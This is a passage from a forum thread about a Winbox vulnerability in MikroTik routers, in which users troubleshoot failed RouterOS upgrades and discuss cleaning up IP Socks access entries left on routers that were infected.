He already upgraded the router, which requires a reboot, and the link is down anyway (until it's restored in a minute).
Power is only reduced if an indoor frequency is selected, which should not happen (the frequency list knows outdoor from indoor).

Re: Winbox vulnerability: please upgrade

Posted: Sat Jan 05, 2019 2:04 pm
by gotsprings
I upgraded my router and it stopped working...
Check if the update changed your master-slave settings to bridge. That's the #1 thing I saw taking out routers that upgraded from below 6.40.8 to above it. Fixing the bridges and moving IP/DHCP-Server/Filter-Rules to use the new bridge interface got things going again.

Re: Winbox vulnerability: please upgrade

Posted: Sat Jan 05, 2019 5:00 pm
by weixvenum
I'm having issues upgrading. It doesn't do it.. I check for updates then select download and install.. it auto reboots but it stays on the old version, not the new one... I'm using a hAP ac....

Re: Winbox vulnerability: please upgrade

Posted: Sat Jan 05, 2019 5:04 pm
by Deantwo
I'm having issues upgrading. It doesn't do it.. I check for updates then select download and install.. it auto reboots but it stays on the old version, not the new one... I'm using a hAP ac....
Check the architecture of the router, make sure you are using the correct file.

Need more information to be able to help you. What and how are you updating? From what version to what version? Again how are you doing it?

Re: Winbox vulnerability: please upgrade

Posted: Sat Jan 05, 2019 5:50 pm
by weixvenum
I have a hAP ac lite with software version 6.42rc24 and tried different steps updating it to 6.44beta50:

1. System>Routerboard>upgrade
then manual reboot
2. System>Package>check for updates> current>download&install
it downloads then reboots automatically
3. System>Package>check for updates> release candidate> download and install, then it auto reboots
4. quickset>check for updates>current or release candidate>download and install>auto reboot

Re: Winbox vulnerability: please upgrade

Posted: Sat Jan 05, 2019 5:52 pm
by weixvenum
I'm having issues upgrading. It doesn't do it.. I check for updates then select download and install.. it auto reboots but it stays on the old version, not the new one... I'm using a hAP ac....
Check the architecture of the router, make sure you are using the correct file.

Need more information to be able to help you. What and how are you updating? From what version to what version? Again how are you doing it?
I have a hAP ac lite with software version 6.42rc24 and tried different steps updating it to 6.44beta50:

1. System>Routerboard>upgrade
then manual reboot
2. System>Package>check for updates> current>download&install
it downloads then reboots automatically
3. System>Package>check for updates> release candidate> download and install, then it auto reboots
4. quickset>check for updates>current or release candidate>download and install>auto reboot

Re: Winbox vulnerability: please upgrade

Posted: Sat Jan 05, 2019 5:55 pm
by mkx
Anything in log just after reboot?

Did it upgrade to current (6.43.8) in step 2?

Can you post the list of installed packages?

Re: Winbox vulnerability: please upgrade

Posted: Sat Jan 05, 2019 6:22 pm
by weixvenum
Anything in log just after reboot?

Did it upgrade to current (6.43.8) in step 2?

Can you post the list of installed packages?
Screen shot of the logs after reboot
logs.jpg
Nope, it did not upgrade to 6.43.8 or the 6.44beta

Packages installed
packages.jpg

Re: Winbox vulnerability: please upgrade

Posted: Sat Jan 05, 2019 6:31 pm
by mkx
The problem is that you somehow ended up with two instances of the package hotspot installed. You can try to uninstall the stand-alone one (the top one on the screenshot, which is not indented on the list). If you succeed, then you'll be able to upgrade. If you don't succeed (quite probable), then the only way out is netinstall (make a fresh backup, save the backup file off the device, netinstall it to 6.42.x to ensure the highest probability of a successful backup restore) and upgrade to the desired version after that.

Re: Winbox vulnerability: please upgrade

Posted: Sat Jan 05, 2019 7:32 pm
by weixvenum
Thanks.. let me try your suggestion

Re: Winbox vulnerability: please upgrade

Posted: Sat Jan 05, 2019 9:33 pm
by weixvenum
The problem is that you somehow ended up with two instances of the package hotspot installed. You can try to uninstall the stand-alone one (the top one on the screenshot, which is not indented on the list). If you succeed, then you'll be able to upgrade. If you don't succeed (quite probable), then the only way out is netinstall (make a fresh backup, save the backup file off the device, netinstall it to 6.42.x to ensure the highest probability of a successful backup restore) and upgrade to the desired version after that.
THANKS a LOT! It worked and it's updated.

Re: Winbox vulnerability: please upgrade

Posted: Mon Jan 28, 2019 11:45 pm
by Darman
Did somebody notice, after that vulnerability there are thousands of entries in IP-Socks-Access, and when you try to access IP Socks the router gets stuck at 100% CPU, even though IP socks is disabled.
Is there any chance that Mikrotik makes an upgrade version that will automatically remove those socks access entries?

Re: Winbox vulnerability: please upgrade

Posted: Tue Jan 29, 2019 9:36 am
by whatever
@Darman: if your device got infected you should reset it to factory defaults to ensure all the nasty stuff is removed.

Re: Winbox vulnerability: please upgrade

Posted: Tue Jan 29, 2019 10:24 am
by Darman
@Darman: if your device got infected you should reset it to factory defaults to ensure all the nasty stuff is removed.
Thanks, I know, but it would be cool if we could do that Socks access entry removal with an update when the routers are miles away...

Re: Winbox vulnerability: please upgrade

Posted: Tue Jan 29, 2019 10:28 am
by andriys
Darman, how do you think an update will know what socks entries are legitimate and what are not?

Re: Winbox vulnerability: please upgrade

Posted: Tue Jan 29, 2019 10:53 am
by Chupaka
Darman, how do you think an update will know what socks entries are legitimate and what are not?
If CPU is at 100% for the last 5 seconds - remove all IP Socks Access entries xD